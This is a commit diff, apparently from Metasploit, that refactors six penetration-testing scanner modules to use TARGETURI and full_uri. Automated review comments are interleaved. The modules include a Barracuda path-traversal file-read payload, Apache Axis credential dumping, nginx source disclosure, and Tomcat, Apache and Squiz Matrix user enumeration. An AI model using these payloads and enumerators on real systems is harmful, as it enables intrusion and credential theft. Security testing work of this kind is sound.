Land #6281, TARGETURI/full_uri fixes

bug/bundler_fix
William Vu 2015-11-25 13:15:50 -06:00
commit e56aa96a66
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
6 changed files with 66 additions and 95 deletions


@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('URI', [true, 'The path to users Home Page', '/']),
OptString.new('TARGETURI', [true, 'The path to users Home Page', '/']),
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]),
], self.class)
@ -51,11 +51,6 @@ class Metasploit3 < Msf::Auxiliary
)
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def run_host(ip)
@users_found = {}
@ -64,9 +59,9 @@ class Metasploit3 < Msf::Auxiliary
}
if(@users_found.empty?)
print_status("#{target_url} - No users found.")
print_status("#{full_uri} - No users found.")
else
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
report_note(
:host => rhost,
:port => rport,
@ -80,8 +75,8 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user)
vprint_status("#{target_url}~#{user} - Trying UserDir: '#{user}'")
uri = normalize_uri(datastore['URI'])
vprint_status("#{full_uri}~#{user} - Trying UserDir: '#{user}'")
uri = normalize_uri(target_uri.path)
payload = "#{uri}~#{user}/"
begin
res = send_request_cgi(
@ -93,10 +88,10 @@ class Metasploit3 < Msf::Auxiliary
return unless res
if ((res.code == 403) or (res.code == 200))
print_good("#{target_url} - Apache UserDir: '#{user}' found ")
print_good("#{full_uri} - Apache UserDir: '#{user}' found ")
@users_found[user] = :reported
else
vprint_status("#{target_url} - Apache UserDir: '#{user}' not found ")
vprint_status("#{full_uri} - Apache UserDir: '#{user}' not found ")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
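Review bot: Renaming the option from `URI` to `TARGETURI` leaves no fallback for saved workspaces or resource scripts that still set `URI`. As far as the visible lines show, that value is now ignored and the module falls back to the default `/`, so a scan can run against a different path than the operator configured. Either mention the rename in the module description or read the old key first, e.g. `uri = normalize_uri(datastore['URI'] || target_uri.path)`. The same applies to the other five files in this commit. The rescue clauses at the end of `do_login` are cut off by the hunk, so their bodies cannot be reviewed here.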


@ -34,17 +34,12 @@ class Metasploit3 < Msf::Auxiliary
register_options([
Opt::RPORT(8080),
OptString.new('URI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),
OptString.new('TARGETURI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),
], self.class)
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def run_host(ip)
uri = normalize_uri(datastore['URI'])
uri = normalize_uri(target_uri.path)
begin
res = send_request_raw({
@ -53,13 +48,12 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if (res and res.code == 200)
extract_uri = res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
new_uri = "/axis2/services/#{$1}"
new_uri = normalize_uri(new_uri)
res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)
new_uri = normalize_uri("/axis2/services/#{$1}")
get_credentials(new_uri)
else
print_status("#{target_url} - Apache Axis - The remote page not accessible")
print_status("#{full_uri} - Apache Axis - The remote page not accessible")
return
end
@ -106,10 +100,10 @@ class Metasploit3 < Msf::Auxiliary
'uri' => "#{uri}" + lfi_payload,
}, 25)
print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
print_status("#{full_uri} - Apache Axis - Dumping administrative credentials")
if res.nil?
print_error("#{target_url} - Connection timed out")
print_error("#{full_uri} - Connection timed out")
return
end
@ -121,17 +115,17 @@ class Metasploit3 < Msf::Auxiliary
res.body.scan(/parameter\sname=\"password\">([^\s]+)</)
password = $1
print_good("#{target_url} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
print_good("#{full_uri} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")
report_cred(ip: rhost, port: rport, user: username, password: password, proof: res.body)
else
print_error("#{target_url} - Apache Axis - Not Vulnerable")
print_error("#{full_uri} - Apache Axis - Not Vulnerable")
return :abort
end
else
print_error("#{target_url} - Apache Axis - Unrecognized #{res.code} response")
print_error("#{full_uri} - Apache Axis - Unrecognized #{res.code} response")
return :abort
end
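Review bot: The result of the `match` in `run_host` is never checked, so when the response has no `/axis2/services/<name>?` link, `$1` is nil and `get_credentials` is still called with the bare `/axis2/services/` path. Guard it with `return unless res.body.to_s =~ %r{/axis2/services/([^\s]+)\?}` and then build `new_uri = normalize_uri("/axis2/services/#{Regexp.last_match(1)}")`. The `/axis2/services/` prefix is hard-coded in both the regex and `new_uri`, so a non-default TARGETURI prefix is not carried into the follow-up request, although the status lines print `full_uri`. In the credentials hunk, `proof: res.body` stores the whole response and the `print_good` line writes the password to the console in clear text. Both functions continue outside the visible hunks.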


@ -38,21 +38,16 @@ class Metasploit3 < Msf::Auxiliary
[
Opt::RPORT(8000),
OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", '/mail/snapshot/config.snapshot']),
OptString.new('URI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
OptString.new('TARGETURI', [true, 'Barracuda vulnerable URI path', '/cgi-mod/view_help.cgi']),
], self.class)
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def run_host(ip)
uri = normalize_uri(datastore['URI'])
uri = normalize_uri(target_uri.path)
file = datastore['FILE']
payload = "?locale=/../../../../../../..#{file}%00"
print_status("#{target_url} - Barracuda - Checking if remote server is vulnerable")
print_status("#{full_uri} - Barracuda - Checking if remote server is vulnerable")
res = send_request_raw(
{
@ -61,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if res.nil?
print_error("#{target_url} - Connection timed out")
print_error("#{full_uri} - Connection timed out")
return
end
@ -73,21 +68,21 @@ class Metasploit3 < Msf::Auxiliary
if html.length > 100
file_data = html.gsub(%r{</?[^>]+?>}, '')
print_good("#{target_url} - Barracuda - Vulnerable")
print_good("#{target_url} - Barracuda - File Output:\n" + file_data + "\n")
print_good("#{full_uri} - Barracuda - Vulnerable")
print_good("#{full_uri} - Barracuda - File Output:\n" + file_data + "\n")
else
print_error("#{target_url} - Barracuda - Not vulnerable: HTML too short?")
print_error("#{full_uri} - Barracuda - Not vulnerable: HTML too short?")
end
elsif res.body =~ /help_page/
print_error("#{target_url} - Barracuda - Not vulnerable: Patched?")
print_error("#{full_uri} - Barracuda - Not vulnerable: Patched?")
else
print_error("#{target_url} - Barracuda - File not found or permission denied")
print_error("#{full_uri} - Barracuda - File not found or permission denied")
end
else
print_error("#{target_url} - Barracuda - No HTML was returned")
print_error("#{full_uri} - Barracuda - No HTML was returned")
end
else
print_error("#{target_url} - Barracuda - Unrecognized #{res.code} response")
print_error("#{full_uri} - Barracuda - Unrecognized #{res.code} response")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
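Review bot: The retrieved file is only echoed to the console by the `File Output` `print_good` line, so its content lands in scrollback and any spool log instead of the workspace's loot store. That matters because the default `config.snapshot` may hold configuration secrets. Consider `path = store_loot('barracuda.file', 'text/plain', rhost, file_data, file)` and printing only `path`. The text is server-controlled and only has HTML tags stripped, so control characters reach the terminal unless the print helpers filter them, which is not visible here. `run_host` ends outside the last hunk, so the rescue handling cannot be reviewed.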


@ -35,18 +35,13 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('URI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
OptString.new('TARGETURI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
OptString.new('PATH_SAVE', [true, 'The path to save the downloaded source code', '']),
], self.class)
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def run_host(ip)
uri = normalize_uri(datastore['URI'])
uri = normalize_uri(target_uri.path)
path_save = datastore['PATH_SAVE']
vuln_versions = [
@ -70,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if res.nil?
print_error("#{target_url} - nginx - Connection timed out")
print_error("#{full_uri} - nginx - Connection timed out")
return
else
version = res.headers['Server']
@ -78,17 +73,17 @@ class Metasploit3 < Msf::Auxiliary
end
if vuln_versions.include?(version)
print_good("#{target_url} - nginx - Vulnerable version: #{version}")
print_good("#{full_uri} - nginx - Vulnerable version: #{version}")
if (res and res.code == 200)
print_good("#{target_url} - nginx - Getting the source of page #{uri}")
print_good("#{full_uri} - nginx - Getting the source of page #{uri}")
save_source = File.new("#{path_save}#{uri}","w")
save_source.puts(res.body.to_s)
save_source.close
print_status("#{target_url} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
print_status("#{full_uri} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
else
print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response")
@ -98,9 +93,9 @@ class Metasploit3 < Msf::Auxiliary
else
if version =~ /nginx/
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
else
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not ngnix")
print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not ngnix")
end
return
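Review bot: The local save path is built by plain concatenation, `"#{path_save}#{uri}"`, and `uri` now comes from `target_uri.path`. A TARGETURI with a subdirectory therefore fails on a missing directory, and one containing `..` segments could write outside PATH_SAVE (whether `normalize_uri` strips them is not visible here). Prefer `local = File.join(path_save, File.basename(uri))` with the block form `File.open(local, 'w') { |f| f.puts(res.body.to_s) }`, which also closes the handle if the write raises. `File.exists?` on the changed line is deprecated in favour of `File.exist?`. The `print_error("http://#{vhost}:#{rport} - nginx - Unrecognized ...")` line was left unconverted and still hard-codes the scheme.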


@ -40,17 +40,12 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('URI', [true, 'The path to users Squiz Matrix installation', '/']),
OptString.new('TARGETURI', [true, 'The path to users Squiz Matrix installation', '/']),
OptInt.new('ASSETBEGIN', [ true, "Asset ID to start at", 1]),
OptInt.new('ASSETEND', [ true, "Asset ID to stop at", 100]),
], self.class)
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def run_host(ip)
@users_found = {}
@ -65,9 +60,9 @@ class Metasploit3 < Msf::Auxiliary
end
if(@users_found.empty?)
print_status("#{target_url} - No users found.")
print_status("#{full_uri} - No users found.")
else
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
report_note(
:host => rhost,
:port => rport,
@ -106,16 +101,18 @@ class Metasploit3 < Msf::Auxiliary
def do_enum(asset)
begin
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => "#{target_url}?a=#{asset}",
'uri' => "#{uri}?a=#{asset}",
'method' => 'GET'
}, 20)
if (datastore['VERBOSE'])
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>(\w+)<\/i>/)
print_status("#{target_url}?a=#{asset} - Trying Asset: '#{asset}' title '#{$1}'")
print_status("#{full_uri}?a=#{asset} - Trying Asset: '#{asset}' title '#{$1}'")
else
print_status("#{target_url}?a=#{asset} - Trying Asset: '#{asset}'")
print_status("#{full_uri}?a=#{asset} - Trying Asset: '#{asset}'")
end
end
@ -123,25 +120,25 @@ class Metasploit3 < Msf::Auxiliary
user=$1.strip
# try the full name of the user
tmpasset = asset -1
tmpasset = asset - 1
res = send_request_cgi({
'uri' => "#{target_url}?a=#{tmpasset}",
'uri' => "#{uri}?a=#{tmpasset}",
'method' => 'GET'
}, 20)
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>Inbox<\/i>/)
tmpasset = asset -2
tmpasset = asset - 2
res = send_request_cgi({
'uri' => "#{target_url}?a=#{tmpasset}",
'uri' => "#{uri}?a=#{tmpasset}",
'method' => 'GET'
}, 20)
print_good("#{target_url}?a=#{asset} - Trying to obtain fullname for Asset ID '#{asset}', '#{user}'")
print_good("#{full_uri}?a=#{asset} - Trying to obtain fullname for Asset ID '#{asset}', '#{user}'")
if (res and res.code = 403 and res.body and res.body =~ /You do not have permission to access <i>(.*)<\/i>/)
fullname = $1.strip
print_good("#{target_url}?a=#{tmpasset} - Squiz Matrix User Found: '#{user}' (#{fullname})")
print_good("#{full_uri}?a=#{tmpasset} - Squiz Matrix User Found: '#{user}' (#{fullname})")
@users_found["#{user} (#{fullname})"] = :reported
end
else
print_good("#{target_url} - Squiz Matrix User: '#{user}'")
print_good("#{full_uri} - Squiz Matrix User: '#{user}'")
@users_found[user] = :reported
end
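Review bot: The three conditions in `do_enum` that read `res.code = 403` assign 403 to the response code instead of comparing it. The status check therefore always passes, only the body regex decides the outcome, and `res.code` is overwritten for any later use. Each should read `res and res.code == 403 and res.body and ...`. The commit tidies `asset - 1` and `asset - 2` on neighbouring lines but leaves these as they were. `do_enum` continues outside the visible hunks.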


@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
OptString.new('TARGETURI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
File.join(Msf::Config.data_directory, "wordlists", "tomcat_mgr_default_users.txt") ]),
], self.class)
@ -49,16 +49,11 @@ class Metasploit3 < Msf::Auxiliary
deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME')
end
def target_url
uri = normalize_uri(datastore['URI'])
"http://#{vhost}:#{rport}#{uri}"
end
def has_j_security_check?
vprint_status("#{target_url} - Checking j_security_check...")
res = send_request_raw({'uri' => normalize_uri(datastore['URI'])})
vprint_status("#{full_uri} - Checking j_security_check...")
res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
if res
vprint_status("#{target_url} - Server returned: #{res.code.to_s}")
vprint_status("#{full_uri} - Server returned: #{res.code.to_s}")
return true if res.code == 200 or res.code == 302
end
@ -67,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
unless has_j_security_check?
print_error("#{target_url} - Unable to enumerate users with this URI")
print_error("#{full_uri} - Unable to enumerate users with this URI")
return
end
@ -78,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary
}
if(@users_found.empty?)
print_status("#{target_url} - No users found.")
print_status("#{full_uri} - No users found.")
else
print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}")
print_good("#{full_uri} - Users found: #{@users_found.keys.sort.join(", ")}")
report_note(
:host => rhost,
:port => rport,
@ -92,34 +87,34 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user)
post_data = "j_username=#{user}&password=%"
vprint_status("#{target_url} - Apache Tomcat - Trying name: '#{user}'")
vprint_status("#{full_uri} - Apache Tomcat - Trying name: '#{user}'")
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(datastore['URI']),
'uri' => normalize_uri(target_uri.path),
'data' => post_data,
}, 20)
if res and res.code == 200 and !res.get_cookies.empty?
vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
elsif res and res.code == 200 and res.body =~ /invalid username/i
vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
vprint_error("#{full_uri} - Apache Tomcat #{user} not found ")
elsif res and res.code == 500
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
vprint_good("#{target_url} - Apache Tomcat #{user} found ")
vprint_good("#{full_uri} - Apache Tomcat #{user} found ")
@users_found[user] = :reported
elsif res and res.body.empty? and res.headers['Location'] !~ /error\.jsp$/
# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
print_good("#{target_url} - Apache Tomcat #{user} found ")
print_good("#{full_uri} - Apache Tomcat #{user} found ")
@users_found[user] = :reported
else
print_error("#{target_url} - NOT VULNERABLE")
print_error("#{full_uri} - NOT VULNERABLE")
return :abort
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
print_error("#{target_url} - UNREACHABLE")
print_error("#{full_uri} - UNREACHABLE")
return :abort
end
end
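Review bot: In `do_login`, the branch `res.body.empty? and res.headers['Location'] !~ /error\.jsp$/` is also true when there is no Location header, because `nil !~ regex` evaluates to true. Any empty-body response that falls through the earlier branches is then recorded as a valid user. Requiring the header closes that gap: `elsif res and res.body.empty? and res.headers['Location'] and res.headers['Location'] !~ /error\.jsp\z/`, where `\z` anchors at the end of the string rather than the end of a line. Separately, `user` is interpolated into `post_data` without URL-encoding, so a wordlist entry containing `&` or `=` changes the form fields that are sent. The 500 branch reports a hit with `vprint_good` while the redirect branch uses `print_good`, so equivalent findings are shown at different verbosity.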